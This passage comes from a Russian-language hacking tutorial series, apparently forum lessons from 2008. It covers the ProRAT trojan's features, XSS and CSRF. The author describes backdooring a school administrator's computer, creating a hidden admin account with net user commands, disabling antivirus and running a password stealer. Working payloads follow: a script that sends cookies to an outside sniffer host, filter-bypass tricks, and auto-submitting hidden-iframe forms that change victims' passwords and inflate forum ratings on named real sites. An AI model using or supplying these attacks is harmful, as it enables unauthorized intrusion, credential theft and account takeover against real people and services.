Screen Shot -- Screen Shot[Method1] и все сделанные скрины сохраняются для того чтобы открыть сохранённые рисунки нужно нажать Open Images Directory

6)Give Damage
Моя самя любимая функция....)))удаляем все дрова.....у удалённого компа...сделать это можно
Give Davage -- Format Drives

7)Run(название говорит само за себя...."запуск")
От сюда можно запускать vbs скрипты...ключи реестра...батовские файлы.....команды MSDOS`a а это очень полезная вещь однако....

Вот один из ДОСовских финтов....
Net user xakep(<-логин) admin(<-пароль) /add
Вот как в чистом виде выглядит
Net user xakep9009 admin /add       //это мы создали новую учётную запись на удалённом компьютере)))
А чтобы присвоить ей права администарора пишем...
Net localgroup administrator(<--это группа к которой мы присваиваем) xakep9009(<--а это кого присваеваем) /add
В чистом виде это выглядит так...
Net localgroup administrator xakep9009 /add

8)Applications
При помощи этой фишки можно удалять процессы программ которые выполняются сейчас....тоже мега важная вещь.....

Ну а дальше идут чисто фишки чтобы побаловаться.....и мне они не очень нравятся....но я их перечислю....
9.1)Funny Stuff
Она включает в себя
Закрытие\Открытие сидирома
Всякого рода стёба над видом рабочего места...
Скрытие значков с рабочего стола.....скрытие часов...кнопки пуск.....переворачивание монитора.....(рабочий стол переворачивается верх головой)Заблокировать мыш....заставить её бегать по экрану хаотично....
9.2)IExplorer
Разного рода проделки с бедным браузером....
Задание домашней странички....изминение его титула......(чтобы назывался не IExplorer а любое другое название)или просто перейти по ссылке.....
9.3)Shut Down PC
Выключение ...перезагрузка.....спящий режим....
9.4)Chat
Переписываться с жертвой чтобы она ничего не могла сделать....кроме как ответить вам......
9.5)Massage
Сообщение....в виде ошибки.....

____________________
Ну и пожалуй я забыл еще сказать про PC info (из основных вкладок)
PC info -- System information
и видим информацию о системе....или вот еще Last visitied  25 site (25 последних сайтов которые были открыты)

вот собственно тут я подведу точку в описании и расскажу свой личный опыт....как я "поработал с этой прогой"

Месяц назад мне друг закриптовал приватным криптором эту замечатильную вещь и я сразу пошёл в инст. пробовать))))
У нас все компы в локалке.....и один комп главный.....там сидит администратор....я попросил как обычно открыть мою презентацию чтобы её отредактировали ....но только её попытались открыть вылетела ошибка "Ваш файл повреждён!"....я с огорчением ушёл на пол часа.....
Потом вернулся снова...чтобы типа посёрфать инет....подключил флешку...открыл ПРОрат и подключился к компу проделал финт с ДОС командами и у меня в кармане была свежая учётка Админа......но на этом я не успакоился...отключил антивирус....и скопировал с флехи пинч...на ту машину....и запустил....на моё удивление пассы админов были сохранены......и аккуратно перескачили ко мне))))но я их увидил только дома......стёб над Админами я не проводил....так как это люди как ни как)))

Заключение.

1)Мы с вами познакомились с такой известной хак тулзой как  ProRAT
2)Рассмотрели несколько способов как можно получить IP в локальной сети...или просто
3)Ознакомились с основными функциями этой программы
4)Узнали про эмулятор доса (вернее про то что он не бесполезен)//финт с MSDOS
5)Узнали...или повторили что такое статически IP
6)Ну и конечно познакомились с таким видом атаки как Backdoor //теперь если услышите можете сказать....а я тоже могу провести backdoor. 

___________________________________________________________

Ну собственно я хотел чтобы в 9ом уроке мы уже начали нападение про сайты изучать....но что то мне приспичело вас познакомить с backdoor`ом.......и я еще подумал...что юбилейный урок должен быть мега супер пупер....и я эту тематику(взлом WEB) оставил для него....
Надеюсь вы что то новое узнали для себя.

_________________________________________________________________________________________

Да и кстати радостная весть про людей озабоченных с пинчём)))
Я недавно разобрался как можно вам помочь чтобы парсер у вас работал.....
Удалите всё из папки Reports
Открываем Реестр ...жмём
Moй компьютер (ВАЖНО ПОСТАВЬТЕ КУРСОР НА ЭТУ ВЕТКУ , ТОГДА ПОИСК НАЧНЁТСЯ С САМОГО НАЧАЛА) ---- Ctrl+F --- Parser2 (можете прямо скопировать что искать....)--(после чего удаляете все ключи связанные с Parser2(там где присутствует это слово....)

После чего....сохрание ваши отчёты (.bin) на рабочий стол......
Перенисите Parser2 обратно в папку Reports откройте Parser2 опять сделайте дефалтные настройки......и после этого перетащите отчёты с рабочего стола.....на белое поле программы Parser2 ....и у вас откроится отчёт.....(если обасобить...то вы просто перетаскиваете отчёт в программу)

А если не получится....проделайте всё еще раз...начиная с очистки реестра...только в этот раз не создавайте заново дефалтные настроки в Парсере....он их уже сохранит....просто перетаците .bin файл в Парсер......
Можно пропустить.
______________________________________________
Это ппц.....уже в третий раз переписываю статью......всё из-за моего упрямства.....
Люблю писать прямо в браузере.....
Энтузиазм пропал....но я постараюсь всё востановить.
______________________________________________

Урок 10.

XSS

_________________________________________________
А начну я пожалуй с нашей защиты....для того чтобы нас не нашли...нам надо использовать Proxy
но с ними вечно проблеммы так-как он очень быстро портится....и очень медленный...
А я вас познакомлю с такой программой как Tor.
Скачать его можно тут
http://www.torproject.org/download.html.ru
Он работает по принцыпу....вы седите через другово пользователя подключенного к этому сервису ...а тот пользователь через другово....а тот через другово....а тот в свою очередеть через другов.....а тот....=)
Короче фиг найдёшь исходного человека....
После того как вы установили Tor и установили плагин на ваш стандартный браузер у вас появится в правом нижнем углу (вашего браузера) Tor отключён после нажатия на эту надпись он включится......
Иногда бывает что тот через кого вы седите.......очень тормознутый...или находится в другой стране ...в которой запрещён вход на тот сайт который вы хотите......чтобы сменить этого пользователя отключитесь от тора.....а потом еще раз включите его...//это делается двумя щелчками в правый нижний угол вашего браузера.....
вот теперь можно преступать.
_________________________________________________

Эта аббревиатура переводится как cross site sсriрting (меж сайтовый скриптинг) тоесть внедрение произвольного кода (скрипта).
Как вы заметили вместо буквы C поставили X  для того чтобы не путать с CSS (Каскадные таблицы стилей) //то что вы должны были изучить вместе с html

Этот вид атаки мой самый любимый....так как большинство программистов пренибрегают этим видом атаки...считая его не дееспасобным....
тем самым отказываются закрывать дырки из-за ненадобности.....

Для того чтобы определить присутствует ли эта уязвимость ....вам достаточно подставить специальный скрипт(см.ниже)...в различные переменные,в ПМ(сообщения проходящие по этому сайту) в поисковик(раположенный на этом сайте), в любые поля где можно что то заполнить....

'><sсriрt>alert('Xakep9009_Rullzz')</sсriрt>

В место Xakep9009_Rullzz Вы можете написать любой текст.....
а '> я применил для того чтобы быть уверенным что мы закрыли последний тэг....который прописанн уже в самом сайте......

Если данный вид уязвимости присутствует то вы увидите вот что...
http://shurem.ru/main_lst.php?top_id=393&amp;order='><srit>alert(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E

Как вы видите .....я подставил '><sсriрt>alert('Xakep9009_Rullzz')</sсriрt> в переменную  order.
Кстати вы наверное заметили как наш скрипт приобразился.....
в место '><sсriрt>alert('Xakep9009_Rullzz')</sсriрt> стал%27%3E%3Csсriрt%3Ealert(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E
Ко второму виду записи была применена URL encode (шифровка символов в URL)
В дальнейшем мы будем делать это для того чтобы обходить фильтры......
А закодировать любое слово или фразу можно при помощи вот этого сайта.....
http://www.w3schools.com/TAGS/ref_urlencode.asp

Пример:стоит фильтр на символ ' мы набираем вместо этого символа %27 и обходим этот фильтр.

XSS бывают пасивные и активные

1)Пасивные XSS это такой вид который требует от жертвы какого то действия чаще всего это перехода на определённую ссылку....

http://shurem.ru/main_lst.php?top_id=393&amp;order='><srit>alert(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E

Вот это пасивная XSS так как чтобы она работала на хакера....нужно заставить жертву перейти по ней.....

2)Активные Это те XSS которые не требуют от пользователя особо напрягаться.....тоесть переходить по ссылкам.....которые мы иму скажем....

Теперь давайте рассмотрим Активные XSS
Для этого зарегистрируйтесь вот тут....
http://shurem.ru/index.php?action=2 //регистрация не требует ничего кроме ввода логина и пароля....

После регистрации открываем http://shurem.ru/mess_frm.php
И мы попадаем в раздел создания и отправки писем.....
Теперь вписываем в тему письма            "<sсriрt>alert('Xakep9009_Rullz')</sсriрt> Привет."
А в само письмо <sсriрt>alert('Hellow_World')</sсriрt>

И чтобы проверить наличие уязвимости отправляем письмо самому себе ...... тоесть в поле Получатели пишем свой ник...
И получаем сообщение ....

Теперь вы каждый раз перейда на http://shurem.ru/mess_lst.php эту страничку (пока не удалите сообщение) будете видеть вылетающую ошику.

То что в поле "Тема" присутствует уязвимость мы разобрались...а как насчёт самого псьма.....
Зайтиде в него.....(нажав на тему "Привет.")
И вы увидели что Вылетела ошибка с надпесью Hellow_World Это означает ....что XSS присутсвует не только в поле Тема но и в самом тексте сообщения.

Полазяв по этому сайту еще пару минут обнаружил что скрипты можно вставлять не только в тему сообщения ...в само сообщение....но и даже в личную информацию....!!!!

Заходим в http://shurem.ru/user_inf.php
и редактируем свою информацию.....
Допустим в сведенья пишем нашу стандартную фишку <sсriрt>alert('xss')</sсriрt>
И каждый кто откроет нашу анкету будет видеть эту вылетающую ошибку....

Мы с вами разобрались с Пасивными и Активными XSS , а теперь нам надо понять....а для чего нам они вообще нужны.....(эти найденые дыры)
Есть много вариантов их применения .....допустим найдя на каком то из известных ресурсов XSS можно похвастаться девушке и написать ей любовное сообщение в виде ошибки.

Но это мы оставим на потом....потому как основное применение этой уязвимости для того чтобы своровать Cookies.
Если сказать своими словами...то в Cookies`ax хранится информация о входе пользователя на определённый ресурс.....и сохраняется эта информация в браузере....узнав Cookies от определённого сайта мы сможем зайти на него под тем пользователем ....у которого мы украли эти Кукисы.....
//но это я рассказал вам со своих слов .... более полную информацию получите тутhttp://ru.wikipedia.org/wiki/HTTP_cookie

А теперь давайте применим наши найденные уязвимости на практике....не поленитесь и создайте еще одного пользователя....

Это для лучшего усвоения.
Допустим
qwerty1 - хакер
qwerty2 - атакуемый

Теперь нам надо найти сниффер Кукисов...
И мы будем использовать с вами Античатовский сниффер.
Ибо он хороший...но только для паблика.
Потому что какой нибуть Олень вопхнёт ссылку на форум....и скажет что там Мега порно...люди переходят....а так как XSS там не присутствует Куккисы не воруются....а приходят чисто пустые поля.....с адресом сайта Refere .....тем самым просто флудят лог.

Входим под Хакером в моём случае это Qwerty1
Редактируем свою страничку
http://shurem.ru/user_upd.php

Вот таким образом.....пишем в поле Сведенья
<sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt>

Выходим из Хакера и переходим вот сюда
http://old.antichat.ru/sniff/log.php сдесь вы увидите что тут уже присутсвует одна запись с сайта Referer=http://www.Shurem.ru Итд.
Это вы только что пропалили свои кукисы....=) так как страничка после нажатия редактировать перекидывает вас на неё....только уже отредактированную =)))

( не закрываем античатовскую страничку)
Входим под пользователем жертвой....в моём случае это qwerty2 и переходим на страничку http://shurem.ru/user_inf.php?user=qwerty1
Где qwerty1 это ник Хакера.

Обновляем страничку ЛОГА и получаем

[Sun Oct 12 20:24:37 2008] IP=78.106.95.120 SITE=shurem.ru
   REFERER=http://shurem.ru/user_inf.php?user=qwerty1
   QUERY=PHPSESSID=cb5185cf87ea38c06fec30afb4622fcf
   AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3

//выходим из qwerty2 (атакуемого)

Где REFERER это откуда пришёл этот человек.
IP он и в африке IP
и нас интересует третяя строчка.....
QUERY=PHPSESSID=cb5185cf87ea38c06fec30afb4622fcf //это и есть кукисы....которые нам нужно подменить...а сделать это нужно при помощи Opera браузер....
К сожалению Фаер фокс (который стоит у меня ) этого не умеет а уж про Осла и говорить то нечего....
Качаем Оперу.....(если нету) от сюда http://ru.opera.com/

Меняем Кукисы

1)Входим из под Оперы под Хакером.....на этот сайт
//это делается для того чтобы Опера сохранила кукисы Хакера....и потом было что подменять.....в место них...
//если бы мы этого действия не проделали у нас бы было пустое поле в кукисах от этого сайта..(тобишь небыло бы того что нужно подменять)
2)Заходим во вкладки Оперы
Инструменты---Настройки---Дополнительно---Cookies---Управление Cookies---(находим тот сайт которого кукисы нам нужно подменить)открываем эту папку --- Выделяем Кукисы (которые были в этой папке) --- Изменить и дальше изменяем....
В нашем случае в поле Имя это будет
PHPSESSID
А значение
cb5185cf87ea38c06fec30afb4622fcf
Сохраняем.....и жмём Ок....
3)После чего Обновляем страничку и видим что мы под атакуемым пользователем)))вернее под поражонным пользователем.....
Посмотреть под каким вы пользователем сейчас идите можно так http://shurem.ru/user_inf.php

_______________________________________________________________________________________

Я рассмотрел только один способ своровать Кукисы ....а их там мы с вами нашли 4....
//надеюсь встретив в дальнейшем такую уязвимость вы сможете её применять......

Теперь немножечко поговорим о фильтрыах и методах обхода.....
Фильтры используются для того чтобы обезопасить свой ресурс от таких нелепых ошибок.....которые могут привести к тому что вы захватите админку.

Фильтров очень много .....=) и для каждого нужен собственный подход.....

Рассмотрим несколько способов обхода .....
1)Этот способ я уже описывал выше...
про то что можно "закодировать" запрос в URL ......
Этот способ особенно актуален для обхода фильтрации знаков  "  '  < > / . итд.
2)Это по другому сформулировать запрос.....
Допустим заприщены слова <sсriрt> и </sсriрt>
Тогда заменим их на вот такой запрос....

<hr style=`background:url(javasсriрt:alert('xss')\;alert('xss'))`>

3)Иногда программеры со своими фильтрами до такой степени задалбываются ....что тупо прописывают комбинации которые нельзя писать....
Пример: <sсriрt> и </sсriрt> фильтр может отфильтровать эти запросы.....потому как они строго прописанны....
А если написать <sсriрt> и </sсriрt> то их он пропустит.....

4)
Я бы мог вам еще мог долго рассказывать как можно обойти фильтрацию.....но не буду ...так как очень много примеров уже написали до меня.....
(и которые я  сам заимствую)
Поэтому кому будет интересно посмотрите различные виды обхода Фильтров.....тут
http://www.xaker.name/forvb/showthread.php?t=6235
http://www.ua-admin.com/ru/hackzone/pri … amp;cat=19
http://old.antichat.ru/crackchat/HTML/
http://www.dsec.ru/about/articles/web_xss/  //обязательно посмотрите ибо помогает обходить фильтрацию скриптов при помощи изображения =)

Наконец что же за скрипты мы такие впихивали ....=-) и на чём они написанны.....раскрою секрет мы использовали javasсriрt`ы  для использования и нахождения этой уязвимости. (XSS)

Заключение.

В этом уроке мы с вами узнали о
1)Таком виде атаки как XSS
2)На практике узнали как можно использовать пасивные и активные XSS
3)Научились искать уязвимости связанные с XSS
4)Узнали что такое Cookies
5)На практике поменяли украденные Кукисы.
6)Знаем что такое фильтры и как с ним стараться бороться....
7)Теперь мы можем не бояться за свою приватность в сети....или в то время когда мы ломаем сайт....так как знаем что за зверь Tor....

_________________________________________________________________________________

Ну собственно всё.
На самом деле мог бы и лучше написать....так что зарание извиняюсь....но вы сами прикиньте 2 раза переписывать и всё время ход мысли идёт по разному.....
Надеюсь из этого урока вы узнаете что то новое.
Удачи.
Кстати о рейтинге ...сегодня про него я тоже скажу ))))

Но это не самое главное о чём сегодня пойдёт речь.....ведь теперь я затрону такою вещь как XSRF
_______________________________________________________

Урок 11.

XSRF

aka (also known as) Cross Site Request Forgery
Эта уязвимость мега крутая.....=)

Суть её заключается в том....что сайт при выполнении определённых действий со стороны пользователя не проверяет откуда пришёл запрос на это действие.....
Приведу пример чтобы было понятнее.....
Допустим вы сидите vkontakte и вас попросил друг (видя то что вы сидите сейчас в контакте) перейди на его сайт с супер пупер картинкой...или еще с чем....
Вы переходите.....и в это же время от вас отправляется сообщение одному из ваших друзей "Ты дурак ,и всё тут".
//Но вы не думайте это не все возможности XSRF }=)

Первым делом с чего я бы начал....это с создания....

Площадка для тестирования

Для того чтобы поднять свой уровень....нам нужно всё применять на практике.....и первое с чего я начну ....это с регистрации хостинга....

Для  этого урока нам понадобится банальная поддержка html страничек....так что обайдёмся narod.ru

И так...надеюсь с регистрацией всё прошло успешно....
После того как вы заригистрировались...вы можете создавать свой сайт.....

Для того чтобы создать его мы проделвыаем следующие действия
1)После того как вы вошли в свой аккаунт заходим сюда http://narod.yandex.ru/
2)Идём в Мастерскую (Мастерская)
3)Там где вы видете "Редактирование и Управление" нажмите "Управление файлами и HTML редактор"

И так мы поплаи в админку.
Здесь можно удалять....перемещать создавать.....папки и файлы......

Выделим создадим для нашего урока отдельную папку.... и назовём её "test"
Сделать это можно нажав "Создать папку" //далее даёте ей название

После чего в этой папке мы и будем химичить }=)
________________________________________________________________________________________________________________

Теперь перейдём непосредственно к уязвимости.....её очень легко реализовать если ты знаешь html , а собственно такие тэги как
<input ...>
<form> </form>
Если кто не успел с ними познакомиться то вот вам ссылки
http://www.htmlbook.ru/html/input.html
http://www.htmlbook.ru/html/form.html

Практика.

И первое с чего мы начнём это практика.

Заходим на сайт fa-kit.ru и регистрируемся.

Перейдя вот по http://fa-kit.ru/user_pwd.php этой ссылке (после регистрации)
Вам предоставляется право помянять пароль....
Но мы то с вами заметили , что у нас не запрашивают старый пароль....значит можно попробовать нашу уязвимость.....

Открываем исходный код страницы....и он будет выглядеть так.....
______________________________________________________________________________
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/REC-html40/strict.dtd">
<HTML>
<HEAD>
<META name="Robots" content="all">
<META http-equiv="Cash-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=windows-1251" >

<LINK rel='stylesheet' type='text/css' href='main.css'></HEAD>
<bоdу>

<DIV class=title>Изменение пароля пользователя qwerty
</DIV>
<FORM method='POST' action='user_pwd.php'>
<table class="table" align="center">
<tr>
<td class='cell' align='right'><strong>Новый пароль:</strong>

</td>
<td class='cell' align='left'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='' size=12 maxlength=20>
</td>
</tr>
<tr>
<td class='cell' align='right'><strong>Повторите ввод пароля:</strong>
</td>
<td class='cell' align='left'>
<INPUT type='password' name='pass2' id='pass2' class='input' value='' size=12 maxlength=20>
</td>
</tr>
</table>
<DIV class='center'>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>

</DIV>
</FORM></bоdу>
</HTML>
______________________________________________________________________________

Как я уже сказал нам нужны всего то несколько тэгов....это <INPUT и <FORM

Так давайте избавимся от лишнего кода и оставим только нужное.....

_______________________________________________________________________________
<FORM method='POST' action='user_pwd.php'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='' size=12 maxlength=20>
<INPUT type='password' name='pass2' id='pass2' class='input' value='' size=12 maxlength=20>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>
</FORM>

_______________________________________________________________________________
Мы здесь видим что у нас есть 2 поля...куда нужно ввести переменные.....это pass1 и pass2 , а value='' это то куда надо вводить эти переменные....(значение)

Вводим в значение value='qwerty'(будующий пароль) и еще раз подтверждаем этот пароль.....тоесть у нас должно получиться

<FORM method='POST' action='user_pwd.php'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='qwerty' size=12 maxlength=20>
<INPUT type='password' name='pass2' id='pass2' class='input' value='qwerty' size=12 maxlength=20>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>
</FORM>

Далее нам нужно еще подредактировать наш код чтобы
1) Он работал не только с сервера
2) Нужно добиться того , чтобы пользователь не имел вариантов нажатия кнопки.....такие которые мы имеем сейчас..(чтобы он сразу согласился)
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>

Чтобы расправиться с первым пунктом.....нам нужно всего лишь поменять вместо
<FORM method='POST' action='user_pwd.php'>
Прописать полный путь к этой страничке....и у нас получится вот так....
<FORM method='POST' action='http://fa-kit.ru/user_pwd.php'>   //эта ошибка очень частая......не забывайте прописывать полный путь....

А для того , чтобы разобраться со вторым пунктом нужно присвоить форме имя....и прописать в <bоdу> авто загрузку этой формы.....(уже без выбора варианта....(тоесть как долженое)

И в конечном итоге у нас получится вот такой код.

<bоdу оnlоаd="document.forms['test'].submit();">      //Здесь используем имя формы для её выполнения(автозагрузки)
<FORM name="test" method='POST' action="http://fa-kit.ru/user_pwd.php">     //как вы видите мы задали имя форме name="test"
<INPUT type='hidden' name='pass1' id='pass1' class='input' value='qwerty'>
<INPUT type='hidden' name='pass2' id='pass2' class='input' value='qwerty'>
</FORM>
</bоdу>

Вот собственно мы с вами и приготовили ядовитый код.....

Если вы вышли с сайта fa-kit.ru
То зайдите еще раз туда.....

Затем сохраните выш написанный код как html страничку.....
И перейдите по ней.....

После чего ваш пароль поменяется....на тот который вы указали дважды в value=''

Теперь вы можете выложить этот html на народ(narod.ru) и если бы у вас был друг на том сайте зарегистрирован.....вы бы подкинули ему ссылку когда он сидит под своим пользователем на этом сайте...и его пароль бы поменялся на тот который вы бы указали

Очень важно чтобы пользователь сидел в это время под своим аккаунтом...когда вы кидаете ему эту ссыку.....

Собственно вся суть этой атаки и заключается в том что человек сидит под своим акком.....и перейдя по ссылке выполняет все действия(прописанные в коде)...которые он бы мог выполнить сам.....при помощи прав его аккаунта.
______________________________________________________________

Так же вы наверное заметили....что слишком уж бросается в глаза всё это....надо бы сделать это более незаметным....

А делается это очень легко.....
Мы просто создаём отдельный файл.....допустим вот с таким содержанием....
<html>
<title>
Good picture
</title>
<bоdу background="1.jpg"> //1.jpg это картинка....для того чтобы заинтирисовать пользователя....
<ifrаmе src="1.html" width="1" height="1"></ifrаmе>
//этим тэгом мы подгружаем страничку....1.html(в ней хранится наш "ядовитый" код) но так как там стаят параметры width="1" height="1" то человек просто ничего не увидит...а внимаельный пользователь увидит маленький квадратик=) это и будет наша страничка с XSRF.
</bоdу>
</html>
_______________________________________________________________________________________

Знаете как это не удивительно....но на forum.xakep.ru тоже присутствует XSRF....
Я уже давно заметил что можно накручивать себе рейтинг...

Ну и я решил попробовать повысить себе рейтинг =)))

Мы все знаем что за сообщение тоже можно ставить +сы и -усы.....и это тебе идёт в рэйтинг......

Так как мне регаться было лень.....(второго пользователя) то я решил воспользоваться паблик пользователем....
Он присутствует во всех популярных сайтах.....(его регают простые пользователи для того чтобы посмотреть скрытые сообщения итд.)
Таким пользователем оказался qazwsx у которого пароль тоже оказался не мудрёный..... кстати посмотрел я его историю...и тот кто под ним сидел...тоже задавал вопросы про XSRF =)))

И собственно я под этим пользователем чего только не мутил с рейтингом))))

Вот как я сформировал XSRF для накрутки рейтинга...

<bоdу оnlоаd="document.forms['proba'].submit();">
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
<input name="rating" type="hidden" value="2"/>
<textarea id="subject" name="subject" rows="7" cols="70" type="hidden">You are supper!!</textarea>
    <input name="m" value="1239766" type="hidden">
    <input name="u" value="0" type="hidden">
    <input name="forumid" value="275" type="hidden">
</form>
</bоdу>

Ну и дам пожалуй пояснение.....
1)http://forum.xakep.ru/rating.aspx?actio … ;m=1239766 это ссылка на то чтобы оценить мой пост....(я её достал пот пользователем qazwsx)
2)value="2" это значение....сколько надо поставить в рейтинг....(оно может быть от 2 до -2) я пробовал поствить 100 не прокатило   
3)Всё что заключается в <textarea></textarea> это приписка (пояснение почему ты поствил такую оценку)
4)value="1239766" это id ссылки(идентификатор) он должен совпадать с "action=rate&m=1239766"

________________________________________________

Кроме этих примеров....при помощи XSRF Вы можете делать накрутку опросов...спамить гостивые книги....посылать от чужого имени сообщения....

Ну и под конец...не зря же мы регались на народе......

создайте файлик....1.html или файлики.....можете продолжить 2.html....
с вот такой начинкой....

<bоdу оnlоаd="document.forms['proba'].submit();">
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
<input name="rating" type="hidden" value="2"/>
<textarea id="subject" name="subject" rows="7" cols="70" type="hidden">You are supper!!</textarea>
        <input name="m" value="1239766" type="hidden">
        <input name="u" value="0" type="hidden">
        <input name="forumid" value="275" type="hidden">
</form>
</bоdу>

Только в место http://forum.xakep.ru/rating.aspx?actio … ;m=1239766 и  value="1239766" подставьте свои значения....их вы можете узнать от пользователя qazwsx...=)))

0

4

После чего создайте еще один html файлик с названием index.html
И напишите в него вот что.....
<html>
<title>
Good picture
</title>
<bоdу background="1.jpg"> //1.jpg это любая картинка.
<ifrаmе src="1.html" width="1" height="1"></ifrаmе> //тут вы подключили файлик....с XSRF Если у вас их больше то продолжите....
<ifrаmе src="2.html" width="1" height="1"></ifrаmе> //Если у вас их больше одного.....
</bоdу>
</html>

Теперь заходим в папку test.....и  там есть ссылка "Загрузить файлы"
Загружаете все ваши файлы....(картинка,index.html,1.html,2.html)

После чего можете любому форумчанину подкинуть вашу ссылку....она будет примерно выглядеть так....

http://xakep9009.narod.ru/test/index.html

И ваш рейтинг чуть чуть поднимится }=)

Можете мне поднять рейтинг если хотите))) перейдя вот по этой ссылке http://xakep9009.narod.ru/test/index.html ....
(за одно хоть проверю не блокирует ли более чем 2 записи xakep.ru....) я просто проверял с двумя файлами 1.html и 2.html .....ну тогда прокатило удачно))) мне добавили 4 балла)))

Вывод
1)Мы с вами познакомились с такой мега уязвимостью как XSRF
2)Повторили html
3)Узнали как можно прятать загружаемые странички....через тэг ifrаmе
4)На практике рассмотрели к чему может привести XSRF в действии.
5)Теперь будем баловаться с рейтингом 
_____________________________________________________________________________________________________

Ну собственно всё на сегодня))))
Надеюсь ,что вы узнали для себя что то новое.....
и буду очень рад если вы выполните еще одно домашнее задание....

Попробуйте на том же fa-kit.ru написать XSRF для отправки писма.....(от чужого имени)

И еще одно задание потяжелее......
Это найти способ собирать эти ссылки(Оценить сообщение) от опредилённого пользователя....(не в ручную)
и Попробовать написать XSRF для автоматического создания темы на forum.xakep.ru .

А я пойду празновать своё ДР 

< Сообщение отредактировано Xakep9009 -- 19.10.2008 5:13:14 >
Так-с....собственно это моя ошибка....если вы что то не поняли.....
Давайте устранять....
______________________________________________

Что касается рейтинга...если кто не верит....то посмотрите на мой рейтинг.....
С 260 он за день поднялся на 438..... и это учтите что я не впаривал народу ссылку.....(кто хотел тот и поднял мне рейтинг)
//Собственно это я написал , чтобы вы не сомневались в её присутствии ...
Теперь давайте разберёмся почему у вас может не сработать.....
1)Это вы не правильно написали ссылку......(или указали правильную ссылку....а ID забыли переименовать....)
Пример ....
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
А тут вы сделали ошибку.....
<input name="m" value="1239766" type="hidden">

Опять же .....напоминаю....эта ссылка для повышения МОЕГО РЕЙТИНГА.....

А если вы хотите повысить себе рейтинг.....то собирите ссылки от ваших постов......
Сделать это можно так.....
Видите ваш пос......внизу него есть приписка...." [link=http://forum.xakep.ru/m_1224792/mpage_11/key_/javasсriрt:void(repwin('/rating.aspx?action=rate&m=1254738',%20false))]Оценить пост[/link]"
Жмёте на неё....и копируете URL.....и далее подставляете как написано выше.....
2) Это вы сохранили мой код с комментариями......такое тоже может быть.....

______________________________________________________________

А вообще ....очень странно , что у вас не получается.....я всё еще раз перепроверил....у меня всё работает.....

(Что касается fa-kit.ru если у кого то не получилось...(выкиноло сообщение "Привет Хакерам!") это означает что вы не сидели под пользователем во время открытия странички......)
_______________________________________________________________

Если бы вы учили html этих проблемм не возникло.....поэтому постарайтесь в свободное время освежить память(html)

А для тех кто что то еще не понял...я выложу файлики...из этого урока.....
Кто захочет тот всё разберёт и всё поймёт....(хотябы по примерам)

http://rapidshare.com/files/155552220/_ … 1.rar.html

А что касается хостинга..... то phpnet.us не плохой...потдержка php и MySQL =)

Можно пропустить.
_______________________________________________________
После починки ноута я посмотрел , что много вопросов задаётся....с чего начать...
не смотря на то , что я очень тщательно стараюсь отвечать на этот вопрос....вижу что всёравно
вопрос остаётся открытым.Так закроем его раз и навсегда.
_______________________________________________________

Урок 12.

С чего начать свой путь.

Я уверен ,что многие из вас станут хакерами по круче меня раза в 3 ...или в 4...
И уверенность моя заключается в том , что у большинства из вас есть то ,что нету у меня...
1)Усидчивость
2)Правильно спланированное время(время)
3)Мозги //=) их у меня не так уж много =)
_________________________________________________________________________________________________________________________

Когда я начинал изучать взлом....и всё что с ним связанно мне было 12-13 лет =)
Я уже тогда чисто интуитивно понял , что без знания  языка программирования ничего не получится.....
И первым делом я начал изучать Паскаль.
Это была моя первая тотальная ошибка.

Многие твердят ,что его надо изучать для того чтобы понять синтаксис других языков программирования.....итп.
Могу вам сказать...ничего толкового я из этого языка не взял....единственное что я сделал на этом языке это autorun (авторан)
При запихивании дискетки в компьютер....она включала пищалку....(как при переполнении буфера).

Так что взяли на заметку.....такие языки как Basic , Pascal (Турбо Паскаль) не нужны для взлома......
Не тратьте на них своё время....эти языки мёртвые .....единственная причина по которой вы можете их изучить...это любопытство.

И первой моей ступенькой к познанию взлома стал мега прорыв.....
Познание поисковика Google.com

После чего я начал записывать всё что я находил в интернете про взлом ...в тетрадь....дабы не забыть.....
У меня эта тетрадь до сих пор лежит.....там очень много интересного что я тогда выписывал...и каждый год я датировал....и писал когда вносил последние добавления.....(сейчас она у меня как реликвия лежит) =-)

После поисковика я начал читать журнал Хакер.(на данный момент у меня почти все журналы Хакера...кроме самых первых....но их я прочитал в электронном виде)

Но читая всю эту "муть" я понимал что ничего не понимаю...что за shell что за BIOS что за реверс....что за бэкап....ну итд.
Тогда я понял....а почему бы мне не составить словарь Хакера...(собственный)и завёл себе ещё одну тетрадь куда я записывал не известные слова......и после того как входил в интернет искал их и записывал.....до сих пор помню что первым словом в словаре было IP 

Набрав достаточный словарный запас я начал изучать Windows ...
И делал я это опять же в Google набирав запросы на подобии "Скрытые возможности Windows"
После чего я очень сильно продвинулся ибо теперь понимал как можно использовать Crack`и и по какому принцыпу они работают.....

После того как стал продвинутым пользователем Windows (начал понимать работу Windows и исправлять её недочёты) я понял ,что хочется мне чего то по взламывать....

И начал активно капать старые диски Хакера (а именно Видео взом)
На этом этапе я тупо смотрел ....и не понимал что они делают.....попусту тратил время...(и это мой большой минус ибо тогда я не знал....что же они такое делают...и что нужно знать , чтобы самому осознанно такое проделвыать....)
Набравшись опыта могу вам выстроить лестницу по которой вы должны будите пройти ...чтобы стать Хакерами.....и она будет выглядеть так.....

1)Поисковик Google
2)Углублённое знание html
